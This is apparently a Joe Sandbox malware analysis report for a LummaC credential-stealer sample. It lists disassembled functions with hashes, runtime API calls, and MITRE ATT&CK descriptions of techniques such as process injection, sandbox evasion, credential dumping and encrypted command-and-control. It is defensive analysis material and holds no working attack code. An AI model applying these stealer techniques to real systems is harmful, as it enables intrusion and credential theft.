Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: df15d578b406648f2567c3145b7e9c7522a6bbd1ea6eb37fd386212bdada7749
Instruction ID: 905607cd4cd09493d21fd865c82bd0efd85c38a2806ed7afb1df87a729a43b36
Opcode Fuzzy Hash: df15d578b406648f2567c3145b7e9c7522a6bbd1ea6eb37fd386212bdada7749
Instruction Fuzzy Hash: 8B1166F15022647F6B1967B6AC8FCBF799CCECA3983102420F901F5241FAA8EE008270

Function 00E9457B Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E94582
std::_Lockit::_Lockit.LIBCPMT ref: 00E9458C

Part of subcall function 00E924C2: std::_Lockit::_Lockit.LIBCPMT ref: 00E924DE
Part of subcall function 00E924C2: std::_Lockit::~_Lockit.LIBCPMT ref: 00E924F7

codecvt.LIBCPMT ref: 00E945C6
std::_Lockit::~_Lockit.LIBCPMT ref: 00E945FD

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
String ID:
API String ID: 3716348337-0
Opcode ID: 1a4563bb7748c80f337368c4629a88abdf6d3397c5d1ecc35e6eb86a24338dac
Instruction ID: a027bbbf5070aa0bcc6b086cc6a6ba386d9d373103cfaf47535510d091559b93
Opcode Fuzzy Hash: 1a4563bb7748c80f337368c4629a88abdf6d3397c5d1ecc35e6eb86a24338dac
Instruction Fuzzy Hash: 1F01D2B6900115ABCF05EBA4D816ABE77F1BF94310F25260DE512BB2D2CF749E028791

Function 00EAA4E0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00EA9B0F,00000000,00000001,00000000,?,?,00EA5A1F,?,00000000,00000000), ref: 00EAA4F7
GetLastError.KERNEL32(?,00EA9B0F,00000000,00000001,00000000,?,?,00EA5A1F,?,00000000,00000000,?,?,?,00EA5365,00000000), ref: 00EAA503

Part of subcall function 00EAA554: CloseHandle.KERNEL32(FFFFFFFE,00EAA513,?,00EA9B0F,00000000,00000001,00000000,?,?,00EA5A1F,?,00000000,00000000,?,?), ref: 00EAA564

___initconout.LIBCMT ref: 00EAA513

Part of subcall function 00EAA535: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EAA4D1,00EA9AFC,?,?,00EA5A1F,?,00000000,00000000,?), ref: 00EAA548

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00EA9B0F,00000000,00000001,00000000,?,?,00EA5A1F,?,00000000,00000000,?), ref: 00EAA528

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 6f86f4baf16bf7e0d4d215a2a41f924913ec242b6cbad0799339574c24ec61a1
Instruction ID: 6e81a537ec0e26945518376e2adf568d2037302af1140bb10ce08d85c0ac9573
Opcode Fuzzy Hash: 6f86f4baf16bf7e0d4d215a2a41f924913ec242b6cbad0799339574c24ec61a1
Instruction Fuzzy Hash: 91F03736410215FFCF221FA6EC0999B3F66FF89360B044220FA09B9130E7319924DB95

Function 00EA2117 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00E99266,?,?,?,00000055,?,-00000050,?,?,?), ref: 00EA21D6
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00E99266,?,?,?,00000055,?,-00000050,?,?), ref: 00EA220D

Strings

utf8, xrefs: 00EA22DF

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: 5dabd263a472b0fc37319048d0e917dee3adcd00f5450c2a39de320b373bf670
Instruction ID: 86ac1b343bb678847d7960049988ec4b1cb6d94844e10a60eb6e77cbca58e97b
Opcode Fuzzy Hash: 5dabd263a472b0fc37319048d0e917dee3adcd00f5450c2a39de320b373bf670
Instruction Fuzzy Hash: 2351E571644302AADB24AB788C42BA673E8EF5F704F11242DFB05FF181FA74B9448671

Function 00E9DFAC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00E9DEAD,?,?,00000000,00000000,00000000,?), ref: 00E9DFD1

Strings

MOC, xrefs: 00E9DFE3
RCC, xrefs: 00E9DFEB

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 90c7b8a52e3c241f9a5ce866d94129140300ce491d530ac3f6f4d1525842ded1
Instruction ID: f5c7b99d4c0f230e6850fd9bb2f5e30df94fc92e02281c84703d44899eedeeab
Opcode Fuzzy Hash: 90c7b8a52e3c241f9a5ce866d94129140300ce491d530ac3f6f4d1525842ded1
Instruction Fuzzy Hash: 8E416B72A00209AFCF26DF98DC81AEEBBB5FF48304F189059FA0877261D3759990DB50

Function 00E9D818 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00E9DA8F

Strings

csm, xrefs: 00E9DAB1
csm, xrefs: 00E9DB22

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: f9827a029eb534b8eeea0729f57369215a48e5049ec38712c3bc9963a6c48b65
Instruction ID: 14d667345c22a3ab3739b29a9ab40af9d6898a675b9035d6c77df36c291724d1
Opcode Fuzzy Hash: f9827a029eb534b8eeea0729f57369215a48e5049ec38712c3bc9963a6c48b65
Instruction Fuzzy Hash: 3F31F332508228EFCF228F90CC409EA7B65FF08369F19515AFC546A221E372CCB1DB91

Function 00E929C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E94B74
___raise_securityfailure.LIBCMT ref: 00E94C5C

Strings

xf, xrefs: 00E94C57

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: xf
API String ID: 3761405300-1711152663
Opcode ID: ed1ab0a83301f927711fc810f480b536cbdf8116103850510b8a2f196b4581cc
Instruction ID: 2c287bc369c9c98b72a6297c7f2fbd6c984f4a6ba26b3b045c44dc3592b45c1f
Opcode Fuzzy Hash: ed1ab0a83301f927711fc810f480b536cbdf8116103850510b8a2f196b4581cc
Instruction Fuzzy Hash: B421E3B55013209FD701CF27E945B567BF4FB48318F20526BE609AB3A4EBB95889CF44

Function 00E94A8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E94A97
___raise_securityfailure.LIBCMT ref: 00E94B54

Strings

xf, xrefs: 00E94B4F

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: xf
API String ID: 3761405300-1711152663
Opcode ID: e8eff5eebfbb6f6ffc6d46e6d5cb774727bbb75bc4dd09f503bebdbd6868d5e6
Instruction ID: 6796621829b2aadc98f026dc601ccf9a235aaf40e44e0c298e51e60d8647c4e0
Opcode Fuzzy Hash: e8eff5eebfbb6f6ffc6d46e6d5cb774727bbb75bc4dd09f503bebdbd6868d5e6
Instruction Fuzzy Hash: 4511DFB55113249FD701CF67E9856527BF4FB08308B10A26BE908AB3A4EBB89949CF05

Function 00E929D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(00EB648C,ios_base::badbit set,?,?,00E91C84,00EB6478,00E91B17), ref: 00E929DF
ReleaseSRWLockExclusive.KERNEL32(00EB648C,?,?,00E91C84,00EB6478,00E91B17), ref: 00E92A19

Strings

ios_base::badbit set, xrefs: 00E929D8

Memory Dump Source

Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_random.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: ios_base::badbit set
API String ID: 17069307-3882152299
Opcode ID: 558e0259e5dd4e5cc29c90818b58db498b85f200a14cf925ad6b2f4993adda57
Instruction ID: cfa6aaeff5961fe4b88e4340049ddc1bdd449aaaaa4d28b4ca5dbbd0cf8873e3
Opcode Fuzzy Hash: 558e0259e5dd4e5cc29c90818b58db498b85f200a14cf925ad6b2f4993adda57
Instruction Fuzzy Hash: 9CF0A731500500EFCF209F19D805AA6BBB8FBC5734F10132EEAA6732E0C7355846DA55

Analysis Process: random.exe.10.exePID: 7908, Parent PID: 7764COMMON

Executed Functions

Function 0372C65F Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.1737376014.000000000372A000.00000004.00000800.00020000.00000000.sdmp, Offset: 0372A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_372c000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea17e28a2f324f20baa9e14c8b3aa7686c5109669700d5fa1b34b7d26a49e6f3
Instruction ID: 6c12277abc5b250c3bdc6b9659d122b0848815b2b195980775c81e4740cb7391
Opcode Fuzzy Hash: ea17e28a2f324f20baa9e14c8b3aa7686c5109669700d5fa1b34b7d26a49e6f3
Instruction Fuzzy Hash: 0EF0460005EAC38A970FAB3811B80DBFFA6AC1B2707E82789C8E00A197E71412A4C391

Function 0372C65F Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000003.1737376014.000000000372A000.00000004.00000800.00020000.00000000.sdmp, Offset: 0372C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_372c000_random.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea17e28a2f324f20baa9e14c8b3aa7686c5109669700d5fa1b34b7d26a49e6f3
Instruction ID: 6c12277abc5b250c3bdc6b9659d122b0848815b2b195980775c81e4740cb7391
Opcode Fuzzy Hash: ea17e28a2f324f20baa9e14c8b3aa7686c5109669700d5fa1b34b7d26a49e6f3
Instruction Fuzzy Hash: 0EF0460005EAC38A970FAB3811B80DBFFA6AC1B2707E82789C8E00A197E71412A4C391

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report random.exe.10.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

Windows Analysis Report
random.exe.10.exe

Function 00EB519E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 00E91614 Relevance: 9.2, APIs: 6, Instructions: 171
fileCOMMON

Function 00E9155C Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Function 00E9123B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85
COMMON

Function 00EA5283 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Function 00EA5A5C Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 00E9FF89 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 00E9136E Relevance: 1.7, APIs: 1, Instructions: 157
COMMON

Function 00E93C29 Relevance: 1.6, APIs: 1, Instructions: 111
COMMON

Function 00E93C1B Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Function 00E9E531 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre